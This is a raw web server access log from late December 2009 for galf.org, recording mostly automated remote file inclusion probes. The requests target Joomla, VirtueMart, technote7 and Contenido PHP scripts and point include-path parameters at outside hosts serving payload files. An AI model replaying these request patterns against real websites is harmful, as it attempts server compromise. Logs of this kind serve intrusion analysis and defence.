75.151.248.42 - - [28/Dec/2009:05:40:20 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:40:36 -0800] "GET /logs/access_090706.log//atom.php5?page=http://210.205.6.168/~shop/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:41:15 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:41:19 -0800] "GET /logs/access_090629.log//atom.php5?page=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:41:21 -0800] "GET /logs/access_091221.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:05:41:21 -0800] "GET /logs/access_091019.log//atom.php5?page=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [28/Dec/2009:05:41:48 -0800] "GET /logs/access_090921.log///?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [28/Dec/2009:05:41:48 -0800] "GET /logs///?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [28/Dec/2009:05:41:48 -0800] "GET //?_zb_path=http://www.kingleader.com.tw/temp/idxx.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:42:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:42:51 -0800] "GET /logs/access_090810.log/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:45:02 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:45:40 -0800] "GET /logs/access_090810.log/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:05:46:15 -0800] "GET /logs/access_090810.log/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [28/Dec/2009:05:47:00 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:05:47:00 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:05:47:00 -0800] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:05:47:04 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:05:47:04 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:05:47:05 -0800] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:05:47:43 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:05:47:43 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:05:47:43 -0800] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:49:12 -0800] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:49:15 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:49:15 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
128.241.54.188 - - [28/Dec/2009:05:49:18 -0800] "GET /errors.php?error=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:05:49:22 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:05:49:22 -0800] "GET /logs/errors.php?error=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:05:49:53 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:05:49:53 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:05:49:54 -0800] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:50:05 -0800] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:50:06 -0800] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:50:09 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:50:13 -0800] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:50:13 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:05:50:14 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [28/Dec/2009:05:50:19 -0800] "GET /logs//components/com_rwcards/captcha/class.captcha.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:50:19 -0800] "GET /logs/access_090817.log%20%20//components/com_rwcards/captcha/class.captcha.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:50:19 -0800] "GET /components/com_rwcards/captcha/class.captcha.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:50:23 -0800] "GET /logs/access_091130.log%20%20//components/com_rwcards/captcha/class.captcha.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:50:44 -0800] "GET /logs/access_090706.log//components/com_rwcards/captcha/class.captcha.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:50:49 -0800] "GET /logs/access_090817.log//components/com_rwcards/captcha/class.captcha.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:50:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:51:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.0" 404 - "-" "-" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:51:26 -0800] "GET /logs//components/com_rwcards/admin.rwcards.cards.html.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:51:26 -0800] "GET /components/com_rwcards/admin.rwcards.cards.html.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:51:26 -0800] "GET /logs/access_090817.log%20%20//components/com_rwcards/admin.rwcards.cards.html.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:05:51:29 -0800] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [28/Dec/2009:05:51:30 -0800] "GET /logs/access_091130.log%20%20//components/com_rwcards/admin.rwcards.cards.html.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:54:58 -0800] "GET /logs/access_091123.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:54:58 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:54:58 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:55:01 -0800] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.77 - - [28/Dec/2009:05:55:01 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:55:19 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:55:19 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:55:19 -0800] "GET /logs/access_091123.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [28/Dec/2009:05:55:20 -0800] "GET /logs/access_090601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.calvarykoreanschool.org/images/turn1.gif?/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:15 -0800] "GET /components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:19 -0800] "GET /logs//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:19 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:19 -0800] "GET /logs/access_090615.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:19 -0800] "GET /logs/access_090601.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:19 -0800] "GET /logs/access_090622.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:19 -0800] "GET /logs/access_090817.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:21 -0800] "GET /logs/access_090727.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:21 -0800] "GET /logs/access_091012.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:30 -0800] "GET /logs/access_090713.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:30 -0800] "GET /logs/access_090525.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:34 -0800] "GET /logs/access_090928.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:56:34 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:05:56:37 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:57:00 -0800] "GET /logs/access_091019.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:57:14 -0800] "GET /logs/access_090831.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:57:18 -0800] "GET /logs/access_090824.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:57:18 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:58:00 -0800] "GET /logs/access_090803.log%20%20//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:58:39 -0800] "GET /logs/access_090615.log//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:05:58:39 -0800] "GET /logs/access_091221.log//components/com_virtuemart/globals.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:02 -0800] "GET /logs/access_090713.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:11 -0800] "GET /logs/access_090713.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:11 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:23 -0800] "GET /logs/access_090713.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:23 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:25 -0800] "GET /logs/access_090713.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:26 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:00:26 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:09 -0800] "GET /components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:09 -0800] "GET /logs//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:09 -0800] "GET /logs/access_090622.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:09 -0800] "GET /logs/access_090615.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:09 -0800] "GET /logs/access_091221.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:09 -0800] "GET /logs/access_090601.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:13 -0800] "GET /logs/access_090817.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:13 -0800] "GET /logs/access_090727.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:13 -0800] "GET /logs/access_091012.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:21 -0800] "GET /logs/access_090713.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:21 -0800] "GET /logs/access_090525.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:26 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:26 -0800] "GET /logs/access_090928.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:01:55 -0800] "GET /logs/access_091019.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:02:07 -0800] "GET /logs/access_090831.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:02:12 -0800] "GET /logs/access_090824.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:02:12 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:02:52 -0800] "GET /logs/access_090803.log%20%20//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
